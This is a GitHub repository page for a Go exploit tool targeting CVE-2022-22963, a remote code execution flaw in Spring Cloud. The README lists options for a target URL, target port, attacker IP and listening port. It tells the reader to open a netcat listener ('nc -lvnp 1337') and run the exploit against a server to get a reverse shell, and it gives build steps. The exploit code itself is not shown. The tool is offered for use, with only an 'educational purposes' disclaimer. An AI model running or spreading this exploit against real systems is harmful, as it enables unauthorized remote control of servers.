Skip to content

gunzf0x/CVE-2022-22963

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
binaries
binaries
 
 
README.md
README.md
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

CVE-2022-22963

Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.

Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk

Usage

./CVE-2022-22963 -h


Usage:
  CVE-2022-22963 [OPTIONS]

Application Options:
  -u, --target-url=     Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
  -p, --target-port=    Port running the service. Example: -p 8080
  -i, --attacker-ip=    Attacker IPv4 Address. Example: -i 10.10.10.10
  -l, --listening-port= Listening port to connect. Example: -l 1337

Help Options:
  -h, --help            Show this help message

Assume a possible vulnerable target is running at http://somerandomserver.com:8080. Start nc listening on the port 1337, so we run nc -lvnp 1337. Then, run the script/exploit:

./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337

Build from source

If you have go installed in your machine, just do:

git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file

About

Binaries for CVE-2022-22963

Topics

spring-cloud exploits vulnerability cve-2022-22963

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

Binaries v1.0 Latest
May 3, 2023

Packages

No packages published

Languages